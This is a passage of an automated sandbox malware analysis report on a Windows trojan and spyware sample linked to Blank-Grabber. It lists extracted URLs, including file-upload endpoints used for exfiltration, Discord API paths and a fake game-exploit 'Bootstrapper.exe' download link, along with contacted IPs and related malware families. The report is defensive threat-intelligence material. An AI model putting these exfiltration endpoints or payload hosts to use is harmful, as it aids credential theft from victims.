                                                                                                            https://discord.com;http://127.0.0.1:6463/rpc?v=11SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadataSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462238296.000001DCB6230000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://127.0.0.1:64632fbound.exe, 00000011.00000002.1605507236.00000254B6B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://github.com/python/importlib_metadata/wiki/Development-MethodologySecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB63B4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://tools.ietf.org/html/rfc6125#section-6.4.3SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://getsolara.devbound.exe, 00000011.00000002.1605507236.00000254B6B4A000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6B3A000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://www.newtonsoft.com/jsonschemabound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://google.com/mailSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://packaging.python.org/specifications/entry-points/SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462110032.000001DCB6130000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6330000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://www.python.org/psf/license/)SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1474323542.00007FF8E72E8000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pySecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msibound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C15000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://foss.heptapod.net/pypy/pypy/-/issues/3539SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1461987753.000001DCB6030000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412628978.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://127.0.0.1:6463bound.exe, 00000011.00000002.1605507236.00000254B6B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://google.com/SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://www.nodejs.orgbound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://ocsp.sectigo.com0SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://tools.ietf.org/html/rfc7231#section-4.3.6)SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409064610.000001DCB5E95000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412898887.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://99ab5d9c.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exebound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://api.gofile.io/getServerr~SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://contoso.com/Licensepowershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://discordapp.com/api/v9/users/SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourceSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB53C4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://ip-api.com/json/?fields=225545rSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://github.com/urllib3/urllib3/issues/2920SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://api.gofile.io/getServerr~rSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://yahoo.com/SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://www.rfc-editor.org/rfc/rfc825SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5EFB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB5935000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://crl.thawte.com/ThawteTimestampingCA.crl0SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://html.spec.whatwg.org/multipage/SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5EFB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462238296.000001DCB6230000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://www.rfc-editor.org/rfc/rfc8259#section-8.1SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E1F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5E1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://contoso.com/powershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/rawSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6AA1000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://crl.micft.cMicRosofpowershell.exe, 0000000B.00000002.1534955775.000001E373933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://api.gofile.io/getServerSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://nodejs.orgbound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://sectigo.com/CPS0SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://ocsp.thawte.com0SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngzSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://json.orgSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://api.anonfiles.com/uploadr#SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://upx.sf.netAmcache.hve.29.drfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          		unknown

                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                          Public IPs

                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                          172.67.203.125
                                                                                                                                                                                          		getsolara.devUnited States
                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                          208.95.112.1
                                                                                                                                                                                          		ip-api.comUnited States
                                                                                                                                                                                          		53334TUT-ASUStrue
                                                                                                                                                                                          128.116.123.4
                                                                                                                                                                                          		edge-term4-fra2.roblox.comUnited States
                                                                                                                                                                                          		22697ROBLOX-PRODUCTIONUSfalse
                                                                                                                                                                                          104.20.23.46
                                                                                                                                                                                          		nodejs.orgUnited States
                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                          Private

                                                                                                                                                                                          IP
                                                                                                                                                                                          127.0.0.1

                                                                                                                                                                                          General Information

                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                          Analysis ID:1543368
                                                                                                                                                                                          Start date and time:2024-10-27 18:43:26 +01:00
                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                          Overall analysis duration:0h 10m 15s
                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                          Report type:full
                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                          Number of analysed new started processes analysed:35
                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                          Technologies:
                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                          Sample name:SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@43/44@7/5
                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                          • Successful, ratio: 50%
                                                                                                                                                                                          HCA Information:Failed
                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                                          Warnings

                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                          • Execution Graph export aborted for target bound.exe, PID 7976 because it is empty
                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7820 because it is empty
                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                          • VT rate limit hit for: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe

                                                                                                                                                                                          Simulations

                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                          13:44:27API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                          13:44:28API Interceptor99x Sleep call for process: powershell.exe modified
                                                                                                                                                                                          13:44:32API Interceptor46x Sleep call for process: bound.exe modified
                                                                                                                                                                                          13:44:44API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                          IPs

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          172.67.203.125cgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                              hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                      RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                        SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            208.95.112.15K9iuU0ALY.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                            hQr269FZU1.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                            loader.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                            transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                            SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                            New Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                            fEv4R2ahiLCQa5O.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                            PW68YarHboeikgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                            General Agreement.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                                                            • ip-api.com/json
                                                                                                                                                                                                            transferencia interbancaria_66579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting

                                                                                                                                                                                                            Domains

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            www.nodejs.orgcgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            getsolara.devcgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.93.27
